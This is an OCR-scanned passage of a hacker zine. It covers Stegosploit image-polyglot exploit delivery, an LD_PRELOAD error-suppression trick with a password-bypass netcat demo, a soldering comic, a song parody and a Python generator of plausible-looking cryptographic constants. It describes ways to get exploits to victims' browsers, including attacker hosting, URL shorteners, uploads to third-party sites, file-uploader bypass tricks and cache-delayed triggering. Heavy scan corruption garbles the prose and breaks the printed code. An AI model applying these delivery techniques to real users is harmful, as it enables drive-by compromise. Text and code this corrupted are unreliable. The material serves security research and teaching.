xEDBlABBS) OK 
IDAT 8192 bytes CHC: 0x7BA5829E (computed 0 

X7BA5829E) OK 
IDAT 8192 bytes CRC: 0xFDF71282 (computed 0 

XFDF71282) OK 

IDAT 8192 bytes CHC: 0x3AlBE893 (computed 0 

X3A1BE893) OK 
IDAT 8192 bytes CRC: 0x3C9B69C5 (computed 0 

X3C9B69C5) OK 
IDAT 8192 bytes CHC: 0x8E2E6D15 (computed 0 

X8E2E6D15) OK 
IDAT 2920 bytes CRC: 0xAE102222 (computed 0 

XAE102222) OK 
lEND 0 bytes CRC: 0xAE426082 (computed 0 

XAE426082) OK 



Each PNG file must contain one IHDR chunk, the 
image header. Image data is encoded in multiple 
IDAT chunks. Each PNG file must terminate with 
an lEND chunk. 

PNG files are easier to extend than JPG files. We 
can simply insert extra PNG chunks. PNG provides 
informational chunks such as tEXt chunks that may 
be used to contain image metadata. We can insert 
tEXt chunks immediately after the IHDR chunk. 

tEXt chunks are basically name-value pairs, sep- 
arated by a NULL byte 0x00. A tEXt chunk looks 
like this: 

[length] [tEXt] [ name\xOOSaumil Shah ] [CRC] 



An approach taken by Cody Brocious (@daeken) 
explores compressing Javascript code into PNG im- 
ages in his article, "Superpacking JS demos"^^. 

We shall take a slightly different approach, which 
does not involve using illegal PNG chunks, preserv- 
ing the validity of the PNG file and not raising any 
suspicions. The right side of Figure 15 shows how 
to embed HTML data within PNG files. 

Stegosploit's html_in_png.pl utility can be 
used to combine HTML data within a PNG file. 

$ ./html_in_png. pl decoder_cve_2014_0282 . 
html pinklock_encoded . png 
pinklock_polyglot 



Figure 17 presents the output of pngenum.pl run 
on this file. 

This concludes our discussion on HTML+JPG 
and HTML+PNG polyglots for the time being. 

^^http : //daeken. com/superpackiiig-js-demos 



Next we shall explore delivery techniques for these 
polyglots, so that these "images" will auto-run when 
loaded in the browser. 

7.5 HTTP Transport 

In Section 7.3.2, we established the need for the use 
of HTML+Image polyglots to achieve our objective 
of exploits delivered via a single image. We explored 
how to prepare HTML+JPG and HTML+PNG 
polyglots in Section 7.4. 

This section provides a few insights into con- 
trolling some of the finer points of HTTP trans- 
port when it comes to delivering the polyglot to the 
browser. The primary goal is to enable the image 
polyglot to be rendered as HTML in the browser, al- 
lowing the embedded decoder script to execute when 
the document loads. The secondary goal is to avoid 
detection on the network. An interesting side effect 
of time-shifted exploit delivery will be discussed at 
the end of this section. 

Exploring the nuances of HTTP transport in it- 
self can be a very complex topic, so I shall keep the 
discussion restricted to only some relevant points. 

7.5.1 Reaching the Target Browser 

As an attacker, we have the three options for sending 
the HTML+Image polyglot to the victim's browser. 
(1) We can host the image on an attacker-controlled 
web server and send its URL to the victim. (2) We 
could host the entire exploit on a URL shortener. (3) 
We could upload the image to a third-party website 
and provide a direct link. 

It is also possible to combine this with a vast 
array of XSS vulnerabilities, but that is left to the 
reader's imagination and talent. 

Hosting drive-by exploit code on an attacker- 
controlled web server is the most popular of all 
HTTP delivery techniques. The HTML+Image 
polyglot can be hosted as a file with a JPG or PNG 
file extension, an extension not registered with the 
browser's default MIME types, or no file extension 
at all! 

For each case, the web server can be configured 
to deliver the Content-Type : text/html HTTP 
header to force the victim's browser to render the 
polyglot content as an HTML document. An ex- 
plicit Content-Type : header will override file ex- 
tension guessing in the browser. 
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Figure 17: PNG Dump of a Polyglot 
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URL shorteners can be abused far more than just 
hiding a URL behind redirects. My previous re- 
search, presented in a hghtning talk at CanSecWest 
2010,^^ shows how to host an entire exploit vec- 
tor+payload in a URL shortener. With Data URIs 
being adopted by most modern browsers, it is theo- 
reticahy possible to host a polyglot HTML+Image 
resource in a URL shortener. There are certain 
hmits to the length of a URL that a browser wiU 
accept, but some clever work done by services hke 
Hashify.me^^ suggest that this could be overcome. 

For additional tricks that an attacker can per- 
form with URL shorteners, please refer to my article 
in the HITB E-Zine Issue 003, titled "URL Shorten- 
ers Made My Day"^^. 

Several web apphcations ahow user-generated 
content to be hosted on their servers, with content 
white-hsting. Blogs, user profile pictures, document 
sharing platforms, and some other sites ahow this. 

Images are almost always accepted in such ap- 
phcations because they pose no harm to the web 
apphcation's integrity. Several of these apphcations 
store user-generated content on a separate content 
dehvery server, a popular example being Amazon's 
S3. Stored user content can be directly hnked via 
URLs pointing to the hosting server. 

As an example, I tried uploading 
kevin_polyglot to a document sharing apphca- 
tion. The apphcation stores my files on Amazon S3. 
The document can be referred via its direct hnk. 

The HTTP response received is as fohows: 
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HTTP/l.l 200 OK 
X— amz— id —2: 

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
x-amz-request-id : 313373133731337 
Date: Fri , 05 Jun 2015 11:48:57 GMT 
Last-Modified : Wed, 03 Jun 2015 09:07:32 GMT 
E t ag : "BADCODEBADCODEBADCODE" 
X— amz— ser ver — side — encry pt ion : AES256 
Accept— Ranges : bytes 

Content— Type : application/octet — stream 
Content-Length : 195034 
Server : AmazonS3 



When loaded in Internet Explorer, the browser, 
noticing that there is no file extension, pro- 
ceeds to guess the data type of the content via 



Content Snifiing, overriding the Content-Type : 
application/octet-stream header. lE identifies 
the polyglot content as an HTML document, notic- 
ing the presence of <html>< ! - - in the early parts of 
the JPG APPO segment, as discussed in Section 7.4.3. 

Soroush Dahh's excehent presentation "File in 
the hole!" covers several techniques of abusing file 
uploaders used by web applications."^^ In his talk, he 
discusses using double extensions (file.html; . jpg 
on IIS or f ile .html .xyz on Apache), using 
ghost extensions (file.html7oOO.jpg on FCKedi- 
tor), traihng nuh bytes, and case-sensitivity quirks 
to abuse file uploaders. 

7.5.2 Content Sniffing 

A polyglot's greatest advantage, other than evading 
detection, is that it can be rendered in more than 
one context. For example, an image viewer apph- 
cation that supports multiple image formats would 
detect the type of image-based on the file extension. 
In the absence of an extension, the image viewer re- 
lies on the file's magic numbers and header structure 
to determine the image type. 

Browsers are far more complex beasts and are re- 
quired to handle a variety of different data formats: 
HTML, Javascript, Images, CSS, PDF, audio, video; 
the hst goes on. Browsers rely upon two key factors 
for determining the type of content, and thereby in- 
voking the appropriate processor or renderer associ- 
ated with it. These are the resource extension and 
the HTTP Content-Type response header 

In the absence of known extensions or a 
Content-Type header, browsers ideaUy would sim- 
ply offer a raw data dump of the content for the 
user to download. However, over the course of years, 
browsers have tried to implement automatic content 
guessing, called Content Sniffing. 

Michal Zalewski is perhaps one of the leading au- 
thorities in analyzing browser behavior from a secu- 
rity perspective. In his excellent "Browser Security 
Handbook" Zalewski provides a detailed discussion 
on Content Sniffing techniques employed by various 
browsers.^^ 

Figure 18, borrowed from Zalewski's Browser Se- 
curity Handbook, summarizes the results of content 



^^http : //www. slideshare.net/ saumilshah/url-shorteners-made-my-day 
4^http://hashify.me/ 

^^http : / /magazine .hitb . org/ issues/HITB-Ezine-Issue-003 . pdf 

^^http : / / soroush . secpro j ect . com/ downloadable/File°/o20inyo20the°/o20hole ! . pdf 

48v 



^https : //code . google . com/p/browsersec/wiki/Part2 
unzip pocorgtfo08.pdf browsersec.zip 
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Figure 18: Content Sniffing Matrix 



sniffing tests on various browsers. 

Content Sniffing is the ideal weakness for a poly- 
glot to exploit. Combining Content Sniffing tricks 
with dehvery approaches discussed above opens up 
several creative attack dehvery avenues. This is one 
of my topics for future research. 

7.5.3 Time-Shifted Exploit Delivery 

GET/stego.jpg 




^ HTrP200Oir 

Expires: Aug 15 2015 



• 



GET /stego.jpg 



ohai 




Time-Shifted Exploit Dehvery is a technique 
where the exploit code does not need to be trig- 
gered at the same time it is dehvered. The trigger 
can happen much later. 

Assume that we dehver kevin_polyglot as an 
image file via a simple <img> tag. The web server 
serving this image can choose to provide cache con- 
trol information and instruct the browser to cache 
this image for a certain time duration. The HTTP 
Expires response header can be used to this effect. 

Several days later, a URL pointing to 
kevin_polyglot is offered to the victim user. Upon 
chcking the hnk, the browser wih detect a cache-hit 

^^http : //www . outguess . org/detection . php 



and load the "image" into the DOM without making 
a network connection. The exploit wih then be trig- 
gered as before, with the exception that at the time 
of exploitation, no network traffic wih be observed, 
as is ihustrated by the fohowing diagram. 

7.5.4 Mitigation Techniques 

Browser vendors need to start thinking about de- 
tecting polyglot content before it is rendered in the 
DOM. This is easier said than done. 

Server side apphcations that accept user gener- 
ated images should currently transcode ah received 
images— for example, transcode a JPG file to a PNG 
file with shghtly degraded quahty, and back to JPG. 
The idea here is to damage any steganographicahy 
encoded data. 

7.6 Concluding Thoughts 

While the fuh imphcations of practical exploit de- 
hvery via steganography and polyglots are not yet 
clear, I would hke to present a few thoughts. 

Sophisticated exploit dehvery techniques are 
probably closer to being reahty than previously es- 
timated. 

My research for Stegosploit shows that conven- 
tional means of detecting mahcious software fah 
short of stopping such attacks. 

Data containers, e.g. images, previously pre- 
sumed passive and non-offensive, can now be used 
in practical attack scenarios. 
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It is easier to detect polyglot files than stegano- 
graphically encoded images. I ran a few tests with 
stegdetect,^^ one of the de facto tools used to de- 
tect steganography in images. My initial results 
from stegdetect show that none of the encoded 
files were successfuUy detected. 

This is not a fault of stegdetect per se. 
stegdetect is built to detect steganography 
schemes that it knows of. It has a mode that 
supports hnear discriminant analysis to automate 
detection of new steganography methods, however 
it requires several samples of normal and stegano- 
graphic images to perform its classification. I have 
not tested this yet. 

In proper PoC||GTFO style, Stegosploit is dis- 
tributed as a picture of a cat attached to this PDF 
file.^o 
EOF 
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8 On Error Resume Next 

by Jeffball 

Don't you just long for the halcyon days of Visual Basic 6 (VB6)? Between starting arrays at 1 and 
only needing signed data types, Visual Basic was just about as good as it gets. Well, I think it's about time 
we brought back one of my favorite features: On Error Resume Next. For those born too late to enjoy the 
glory of VB6, On Error Resume Next aUowed those courageous VB6 ninjas who dare wield its mightiness to 
continue executing at the next instruction after an exception. While this may remove the pesky requirement 
to handle exceptions, it often caused unexpected behavior. 

When code crashes in Linux, the kernel sends the SIGSEGV signal to the faulting program, commonly 
known as a segfault. Like most signals, this one too can be caught and handled. However, if we don't properly 
clean up whatever caused the segfault, we'h return from that segfault just to cause another segfault. In this 
case, we simply increment the saved RIP register, and now we can safely return. The third argument that is 
passed to the signal handler is a pointer to the user-level context struct that holds the saved context from 
the exception. 

1 void segf ault _ sigact ion ( int signal , siginfo_t *si , void * ptr) { 
( ( ucontext_t *) ptr )— >uc_mcontext . gregs [REG_RIP] + + ; 

3 } 



Now just a httle code to register this signal handler, and we're good to go. In addition to SIGSEGV, 
we'd better register SIGILL and SIGBUS. SIGILL is raised for ihegal instructions, of which we'h have many 
since our On Error Resume Next handler may restart a multi-byte instruction one byte in. SIGBUS is used 
for other types of memory errors (invaUd address aUgnment, non-existent physical address, or some object 
specific hardware errors, etc) so it's best to register it as weU. 

struct sigaction sa ; 

memset(&:sa , 0, sizeof ( sigact ion ) ) ; 

sigempt yset (&;sa . sa_mask) ; 

sa . sa_sigaction = segf ault _ sigact ion ; 

sa.sa_flags = SASIGINFO ; 

sigaction (SIGSEGV, &sa , NULL) ; 
sigaction (SIGILL , &sa , NULL) ; 
sigaction (SIGBUS, &sa , NULL) ; 



In order to help out the users of buggy software, I've included this code as a shared Ubrary that registers 
these handlers upon loading. If your developers are too busy to deal with handling errors or fixing bugs, 
then this project may be for you. To use this code, simply load the library at runtime with the LD_PRELOAD 
environment variable, such as the foUowing: 

1 $ LD_PRELOAD=./liboern . so ./login 



Be wary though, this may lead to some unexpected behavior. The attached example sheU server iUustrates 
this, but can you figure out why it happens?^-^ 

1 $ nc localhost 5555 

Please enter the password : 
3 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

^ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
5 Password correct , starting access shell . . . 



unzip pocorgtfo08.pdf onerror.zip #Beware of spoilers! 
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SOLPERINe IS EASY 



HBRB'S HOiA/ TO DO IT 




THE IRON IS 
HOTH BB CAREFUU 




YOUR KIT SHOULP COME 
]NITH INSTRUCTIONS 
FORmATPARTS GO 
mERE AND mA T m Y! 



CLEAN THE TIP OF 
YOUR IRON BEFORE 
EACH SOLPER 
CONNECTION! 



PUT YOURPARTIN 
PLACE. BEND OUT 
THELEADSSO IT 
STAYS IN PLACE 



LEAD 




PUT THE PCB DO\NN SO 
YOU CAN SOLDER. 



CAREFUL iMITH THE 
SURFACE UNDERNEATH! 



FIND SOME GOOD mY 
TO KEEP IT STEADY 



OK, LETS SOLDER! 

FIRST, YOU mNT TO HEA T 
BOTH THE PAD AND THE LEAD 
FORABOUT 1 SECONP 




IF YOU NBBD A THIRP HANP, YOU CAN MAKB 
ASTANPIN6 COIL OF THB SOLPBR INSTBAP 
OF HOU^ING IT IN YOUR HANP 




PSST! 
CLEAN THE 
TIPFIRST! 



TOUCH THE SOLDERING IRON TO 
BOTH THE PAD AND THE LEAD! 



7 7~ 

NOy\/ FEED SOLDER 

UNDER THE TIP 

OF THE IRON ABOUT 
1-3 MM 




STOP FBBPING SOLPBR, 




SECOND 

SO THE SOLDBR CAN 
FLOnPROPERLY 



\ A 600P CONNBCTION 

\\ COVERS THE PAP 

iVITHOUT TOUCHINe OTHBR PAPS 

\ ANP SURROUNDS 
\\ THE LEAD 



PCB 



PCB 



KHEC 



CUT THE LEADS OFF 

y\!ITH THE ]NIRE CUTTER 



EYES DON'T 
LIKE JUMPIN6 
LEAD BITS! 




\ THE SMOKE FROM THE MELTING SOLDER 
I ISNOT TOXIC, BUT BLOIM GENTLY ON IT 
TO AVOID BREATHING IT. 



LEAD ON THE OTHER HAND 
IS TOXIC, AND GETS ON 
YOUR SKIN mEN HOLDING 
THE SOLDER. 



SOME LEADS ARE ALREADY SHORT . 
YOU DON'T NEED TO CUT THOSE. 





KBBP S0LPBRIN6 BACH PART IN ITS 
CORRBCT PLACB. RBMBMBBR SOMB 
PARTS NBBP TO 60 IN A CBRTAIN mV! 

IF ALL YOUR CONNECTIONS ARE 
GOOD, YOUR CIRCUIT IA/!LL 
JUST IMORK! 

THERE ARE MORE TRICKS YOU mU. LEARN AS 
YOU KEEP SOLDERING, BUT NOiM YOU KNOyV 
ENOUGH TO MAKE MANY COOL THINGS. 



mSH YOUR HANDS 
mEN YOU'RE DONE! 



1 SOLDERING COURSE BY MITCH ALTMAN 
HTTP//CORNFIELDELECTRONICS.COM 

COMIC ADAPTATION BY ANDIE NORDGREN 
HTT P://LOG ANDIE.se 

PUBLIC DOMAIN, USE, COPY, SPREAD! 
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Unbrick My Part 



by EVM and Tommy Brixton 
(no relation to Toni Braxton) 

Don't leave me stuck in this state 

Back out the changes you made 

Restore and cycle my power 

Take these double faults away 

I need you to reflash me now 

My screen just won't come on 

Please hold me now, use and operate me 

Unbrick my part 

Flash my ROM on again 

Undo the damage you caused 

When you jacked up my image and wrote it back on 

Un-ice this freeze 

I crashed so many times 

Unbrick my part 

My part 

Restore my interrupt table 

Fix up my volume labels 

My debug registers are filhng with tears 

Come and clear these bugs away 

My checksums are ah broken 

My CRCs are bad 

And hfe is so cruel without you to operate me 

Unbrick my part 

Flash my ROM on again 

Undo the damage you caused 

When you jacked up my image and wrote it back on 

Un-ice this freeze 

I crashed so many times 

Unbrick my part 

My part 

Don't leave me stuck in this state 

Back out the changes you made 

Please hold me now, use and operate me 
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10 Backdoors up my Sleeve 



SHA-l was designed by the NSA and uses 
the constants 5a827999, 6ed9ebal, 8f Ibbcdc, and 
ca62cld6. In case you haven't aheady noticed, 
these are hex representations of 2^° times the square 
roots of 2, 3, 5, and 10. 

NIST's P-256 ehiptic curve was also designed by 
the NSA and uses coefficients derived from a hash of 
the seed c49d3608 86e70493 6a6678el 139d26b7 
819f 7e90. Don't look for decimals of square roots 
here; we have no idea where this value comes from. 

Which algorithm would you trust the most? 
Right, SHA-1. We don't know why 2, 3, 5, 10 rather 
than 2, 3, 5, 7, or why the square root rather than 
the logarithm, but this looks more convincing than 
some unexplained random-looking number. 

Plausible constants such as \/2 are often caUed 
"nothing-up-my-sleeve" (NUMS) constants, mean- 
ing that there is a kinda-convincing explanation of 
their origin. But it isn't impossible to backdoor an 
algorithm with only NUMS constants, it's just more 
difficult. 

There are basicahy two ways to create a NUMS- 
looking backdoored algorithm. One must either (1) 
bruteforce NUMS constants until one matches the 
backdoor conditions or (2) bruteforce backdoor con- 
stants until one looks NUMS. 

The ffist approach sounds easier, because brute- 
forcing backdoor constants is unhkely to yield a 
NUMS constant, and besides, how do you check that 
some constant is a NUMS? Precompute a huge table 
and look it up? In that case, you're better off brute- 
forcing NUMS constants directly (and you may not 
need to store them). But in either case, you'U need 
a lot of NUMS constants. 

I've been thinking about this a lot after my re- 
search on maUcious hash functions. So I set out 
to write a simple program that would generate a 
huge corpus of NUMS-ish constants, to demonstrate 
to non-cryptographers that "nothing-up-my-sleeve" 
doesn't give much of a guarantee of security, as 
pointed out by Thomas Pornin on Stack Exchange. 

The numsgen.py program generates nearly two 
miUion constants, while I'm writing this.^^ Noth- 
ing new nor clever here; it's just about exploiting 
degrees of freedom in the process of going from a 

^"^https : / / github . com/ veorq/numsgen 
unzip pocorgtfo08.zip numsgen.py 

^^http : //saf ecurves . cr . yp . to/bada55 . html 



hy JP Aumasson 

plausible seed to actual constants. In that PoC pro- 
gram, I went for the foUowing method: 

1. Pick a plausible seed 

2. Encode it to a byte string 

3. Hash it using some hash function 

4. Decode the hash result to the actual constants 

Each step gives you some degrees of freedom, and 
the game is to find somewhat plausible choices. 

As I discovered after releasing this, DJB and oth- 
ers did a similar exercise in the context of manip- 
ulated eUiptic curves in their "BADA55 curves" pa- 
per,^^ though I don't think they released their code. 
Anyway, they make the same point: "The BADA55- 
VPR curves iUustrate the fact that 'verifiably pseu- 
dorandom' curves with 'systematic' seeds generated 
from 'nothing-up-my-sleeve numbers' also do not 
stop the attacker from generating a curve with a 
one-in-a-miUion weakness." The two works obvi- 
ously overlap, but we use sUghtly different tricks. 

10.1 Seeds 

We want to start from some special number, or, 
more precisely, one that wiU look special. We cited 
SHA-l's use of a/2, v/3, v/5, ^/10, but we could have 
cited 

• TT used in ARIA, BLAKE, Blowfish, 

• MD5 using "the integer part of 4294967296 x 

ahs{sin{i)y\ 

' SHA-1 using 0123456789abcdef f edcba98- 
76543210f0eld2c3, 

• SHA-2 using square roots and cube roots of 
the first primes, 

• NewDES using the US Declaration of Indepen- 
dence, 

• Brainpool curves using SHA-1 hashes of tt and 
e. 
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Special numbers may thus be universal math 
constants such as tt or e, or some random-looking 
sequence derived from a special number: smah inte- 
gers such as 2, 3, 5, or some number related to the 
design (hke the closest prime number to the security 
level), or the designer's birthday, or his daughter's 
birthday, etc. 

For most numbers, functions hke the square root 
or trigonometric functions yield an irrational num- 
ber, namely one that can't be expressed as a frac- 
tion, and with an infinite random-looking decimal 
expansion. This means that we have an infinite 
number of digits to choose from! 

Let's now enumerate some NUMS numbers. Ob- 
viously, what looks plausible to the average user may 
not be so for the experienced cryptographer, so the 
notion of "plausibihty" is subjective. Below we'U re- 
strict ourselves to constants similar to those used in 
previous designs, but many more could be imagined 
(hke physical universal constants, text rather than 
numbers, etc). In fact, we'h even restrict ourselves 
to irrational numbers: tt, e, = (1 + >/5)/2 (the 
golden ratio), Euler-Mascheroni's 7, Apery's ("(3) 
constant, and irrationals produced from integers by 
the fohowing functions 

• Natural logarithm, ln(x), irrational for any ra- 
tional X > 1; 

• Decimal logarithm, log(x), irrational unless 
X = lO'^ for some integer n; 

• Square root, ^Jx^ irrational unless x is a per- 
fect square; 

• Cubic root, ^/x^ irrational unless x is a perfect 
cube; 

• Trigonometric functions: sine, cosine, and tan- 
gent, irrational for aU non-zero integers. 

We'U feed these functions with the first six 
primes: 2, 3, 5, 7, 11, 13. This guarantees that 
aU these functions wiU return irrationals. 

Now that we have a bunch of irrationals, which 
of their digits do we record? Since there's an infinite 
number of them, we have to choose. Again, this pre- 
cision must be some plausible number. That's why 
this PoC takes the first N significant digits—Ta.theT 
than just the fractional part— for the foUowing val- 
ues of N: 42, 50, 100, 200, 500, 1000, 32, 64, 128, 
256, 512, and 1024. 



We thus have six primes combined with seven 
functions mapping them to irrationals, plus six ir- 
rationals, for a total of 48 numbers. Multiplying 
by twelve different precisions, that's 576 irrationals. 
For each of those, we also take the multiphcative in- 
verse. For the one of the two that's greater than one, 
we also take the fractional part (thus stripping the 
leading digit from the significant digits). We thus 
have in total 3 x 576 = 1728 seeds. 

Note that seeds needn't be numerical values. 
They can be anything that can be hashed, which 
means pretty much anything: text, images, etc. 
However, it may be more difficult to explain why 
your seed is a Word document or a PCAP than if 
it's just raw numbers or text. 

10.2 Encodings 

Cryptographers aren't known for being good pro- 
grammers, so we can plausibly deny an awkward en- 
coding of the seeds. The PoC tries the obvious raw 
bytes encoding, but also ASCII of the decimal, hex 
(lower and upper case), or even binary digits (with 
and without the Ob prefix). It also tries Base64 of 
raw bytes, or of the decimal integer. 

To get more degrees of freedom you could use 
more exotic encodings, add termination characters, 
timestamps, and so on, but the simpler the better. 

10.3 Hashes 

The purpose of hashing to generate constants is at 
least threefold. 

1. Ensure that the constant looks uniformly ran- 
dom, that it has no symmetries or structure. This 
is, for example, important for the hash functions' 
initial values. Hash functions can thus "sanitize" 
similar NUMS by produce completely different con- 
stants: 

1 »> hex ( int (math . tanh (5) *10**16) ) 

'0x23861f0946f3a0 ' 
3 »> shal(_) . hexdigest () 

' b96cf4dcd99ae8aec4e6d0443c46fe0651a44440 ' 
5 »> hex ( int (math . tanh (7) *10**16) ) 

'0x2386ee907ec8d6 ' 
7 »> shal (_) . hexdigest () 

'7c25092e3fed592eb55cf26b5efc7d7994786d69 ' 



2. Reduce the length of the number to the size of 
the constant. If your seed is the first 1000 digits of 
TT, how do you generate a 128-bit value that depends 
on ah the digits? 
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3. Give the impression of "cryptographic 
strength". Some people associate the use of cryptog- 
raphy with security and confidence, and may beheve 
that constants generated with SHA-3 are safer than 
constants generated with SHA-1. 

Obviously, we want a cryptographic hash rather 
than some fast-and-weak hash hke CRC. A natural 
choice is to start with MD5, SHA-1, and the four 
SHA-2 versions. You may also want to use SHA-3 
or BLAKE2, which will give you even more degrees 
of freedom in choosing their version and parameters. 

Rather than just a hash, you can use a keyed 
hash. In my PoC program, I used HMAC-MD5 and 
HMAC-SHAl, both with 3x3 combinations of the 
key length and value. 

Another option, with even more degrees of free- 
dom, is a key derivation—oi password hashing— 
function. My PoC apphes PBKDF2-HMAC-SHA1, 
the most common instance of PBKDF2, with: either 
32, 64, 128, 512, 1024, 10, 100, or 1000 iterations; a 
salt of 8, 16, or 32 bytes, either all-zero or ah-ones. 
That's 48 versions. 

The PoC thus tries 6 -h 18 -h 48 = 72 different 
hash functions. 

10.4 Decoding 

Decoding of the hashes to actual constants depends 
on what constants you want. In this PoC I just 
want four 32-bit constants, so I only take the first 



128 bits from the hash and parse them either as big- 
or httle-endian. 

10.5 Conclusion 

That's aU pretty simple, and you could argue that 
some choices aren't that plausible (e.g., binary en- 
coding). But that kind of thing would be enough 
to fool many, and most would probably give you 
the benefit of the doubt. After all, only some 
pesky cryptographers object to NIST's unexplained 
curves. 

So with 1728 seeds, 8 encodings, 72 hash func- 
tion instances, and 2 decodings, we have a total of 
1728 x8x72x2 = l, 990, 656 candidate constants. If 
your constants are more sophisticated objects than 
just 32-bit words, you'll likely have many more de- 
grees of freedom to generate many more constants. 

This demonstrates that any invariant in a crypto 
design— constant numbers and coefficients, but also 
operations and their combinations— can be manip- 
ulated. This is typically exploited if there exists a 
one in a billion (or any reasonably low-probability) 
weakness that's only known to the designer. Var- 
ious degrees of exclusive exploitability ("NOBUS") 
may be achieved, depending on what's the secret: 
just the attack technique, or some secret value hke 
in the malicious SHA-1. 

The latest version of the PoC is copied below. 
You may even use it to generate non-mahcious con- 
stants. 



2 
4 
6 
8 
10 
12 
14 
16 
18 
20 
22 
24 



#! / usr / bin/env python 

#https : // github . com/ veorq/numsgen 
?? ?? ?? 

Generator of " nothing— up— my— slee ve " (NUMS) constants . 

This aims to demonstrate that NUMS-looking constants shouldn ' t be 
blindly trusted . 

This program may be used to bruteforce the design of a malicious cipher , 

to create somewhat rigid curves , etc . It generates close to 2 million 

constants , and is easily tweaked to generate many more . 

The code below is pretty much self — explanatory . Please report bugs . 

See also <http://safecurves.cr.yp.to/bada55.html> 

Copyright (c) 2015 Jean — Philippe Aumasson <j eanphilippe . aumasson@gmail . com> 

Under CCO license <http://creativecommons.0rg/publicdomain/zero/l.O/> 
?? ?? ?? 

from base64 import b64encode 
from binascii import unhexlify 
from itertools import product 
from struct import unpack 
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26 
28 
30 
32 
34 
36 
38 
40 
42 
44 
46 
48 
50 
52 
54 
56 
58 
60 
62 
64 
66 
68 
70 
72 
74 
76 
78 
80 
82 
84 
86 
88 



from Crypto.Hash import HMAC, MD5, SHA, SHA224 , SHA256 , SHA384 , SHA512 
from Crypto . Protocol .KDF import PBKDF2 
import mpmath as mp 
import sys 

add your own special primes 
PRIMES = (2, 3, 5, 7, 11, 13) 

PRECISIONS = ( 

42, 50, 100, 200, 500, 1000, 
32, 64, 128, 256, 512, 1024, 

) 

# set mpmath precision 
mp.mp.dps = max(PRECISIONS)+2 

# some popular to — irrat ional transforms (beware exceptions) 
TRANSFORMS = ( 

mp. In , mp. loglO , 
mp. sqrt , mp. cbrt , 
mp.cos, mp. sin , mp.tan, 

) 



IRRATIONALS = [ 
mp. phi , 
mp. pi , 
mp. e , 
mp. euler , 
mp. apery , 
mp. log (mp. pi ) , 

1 +\ 

[ abs ( transform ( prime ) ) \ 

for (prime, transform) in product (PRIMES, TRANSPORMS) ] 

SEEDS = [] 

for num in IRRATIONALS : 
i n V = 1 / num 

seedl = mp. nstr (num, mp.mp. dps) .replace('.', '') 
seed2 = mp. nst r ( inv , mp.mp. dps ).replace('.', '') 
for precision in PRECISIONS : 

SEEDS . append ( seedl [: precision]) 

SEEDS . append (seed2 [: precision]) 
i f num >= 1 : 

seed3 = mp. nst r (num, mp.mp. dps) . split ( ' . ') [1] 

for precision in PRECISIONS : 

SEEDS . append (seed3 [: precision]) 

continue 
if inv >= 1: 

seed4 = mp. nstr ( inv , mp.mp. dps) . split ( ' . ') [1] 

for precision in PRECISIONS : 

SEEDS . append (seed4 [: precision]) 



# some common encodings 
def intlO (x) : 
return x 

def int2 (x) : 

return bin(int(x)) 

def int 2 _ noprefix (x) : 

return bin ( int (x) ) [ 2 : ] 
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90 
92 
94 
96 
98 
100 
102 
104 
106 
108 
110 
112 
114 
116 
118 
120 
122 
124 
126 
128 
130 
132 
134 
136 
138 
140 
142 
144 
146 
148 
150 
152 
154 



def hex_lo (x) : 

xhex = '%x' % int(x) 
if len (xhex) % 2: 

xhex = ' 0 ' + xhex 
return xhex 

def hex_hi (x) : 

xhex = '%K' % int(x) 
if len(xhex) % 2: 

xhex = ' 0 ' + xhex 
return xhex 

def raw(x) : 

return hex_lo (x) . decode ( ' hex ' ) 

def base64_from_int (x) : 
return b64encode(x) 

def base64_from_raw (x) : 

return b64encode (raw (x) ) 

ENCODINGS = ( 
intlO , 
int2 , 

int 2 _ noprefix , 
hex_lo , 
hex_hi , 
raw , 

base64_from_int , 
base64_from_raw , 

) 



def do_hash(x, ahash): 
h = ahash.new() 
h . update (x) 
return h.digest() 

def do_hmac(x, key , ahash): 

h = HMAC. new ( key , digestmod=ahash ) 
h . update (x) 
return h.digest() 

HASHINGS = [ 

lambda x: do_hash(x, MD5) , 

lambda x: do_hash(x, SHA) , 

lambda x: do_hash(x, SHA224) , 

lambda x: do_hash(x, SHA256) , 

lambda x: do_hash(x, SHA384) , 

lambda x: do_hash(x, SHA512) , 



# HMACfe 

for hf in (MD5, SHA) : 

for keybyte in ('\x55', '\xaa', '\xff'): 
for keylen in (16, 32, 64): 

HASHINGS.append(lambda x,\ 

hf=hf , keybyte=keybyte , key len=keylen : \ 
do_hmac(x, keybyte * key len , hf)) 

# PBKDF2S 

for n in (32, 64, 128, 512, 1024, 10, 100, 1000): 
for saltbyte in ('\x00', '\xff'): 
for saltlen in (8 , 16 , 32) : 

HASHINGS.append(lambda x,\ 
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156 
158 
160 
162 
164 
166 
168 
170 
172 
174 
176 
178 
180 
182 
184 
186 
188 
190 
192 
194 
196 
198 
200 
202 
204 



n=n , saltbyte=saltbyte , s al 1 1 e n = s a 1 1 le n : \ 
PBKDF2(x, saltbyte*saltlen , count=n) ) 



DECODINGS = ( 
lambda h : 
unpack 
unpack 
unpack 
unpack 
lambda h : 
unpack 
unpack 
unpack 
unpack 

) 



'>L' 
'>L' 
'>L' 
'>L' 

'<L' 
'<L' 
'<L' 
'<L' 



h[:4]) [0] , 
h[4:8]) [0] , 
h[8:12]) [0] , 
h[12:16]) [0] ,) 

h[:4]) [0] , 
h[4:8]) [0] , 
h[8:12]) [0] , 
h[12:16]) [0] ,) 



MAXNUMS =\ 

len(SEEDS) *\ 
len (ENCODINGS) *\ 
len (HASHINGS) *\ 
len (DECODINGS) 



def main ( ) : 
try : 

nbnums = int ( sy s . argv [ 1 ] ) 
if nbnums > MAXNUMS: 
raise ValueError 

except : 

print ' expected argument < %d (~2"%.2f) '\ 

% (MAXNUMS, mp. log(MAXNUMS, 2)) 
return —1 
count = 0 

for seed , encoding , hashing , decoding in\ 

product (SEEDS, ENCODINGS, HASHINGS, DECODINGS) 

constants = decoding ( hashing ( encoding ( seed ) ) ) 

for constant in constants : 

sys . stdout . write ( ' %08x ' % constant) 
print 

count += 1 
if count = nbnums : 
return count 



if name = ' main_ 

sys . exit (main () ) 
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YOU HAVe^4'T SEEM MY 
STATIONSINCE l INSTALLED 
SSTV WlTM THE NEW 
ROBOT^OO CONVERTER, 

HAVE you roM ? 




-fwE KIPS REALiy lCVE PAO'5 "^'TV STATION^ 
ToM,,, AND $CDO I. 0aPOf?£ PlCK PaTiN 
^STV l REALLY WASN'T Toc \f4^BKS$>re9 
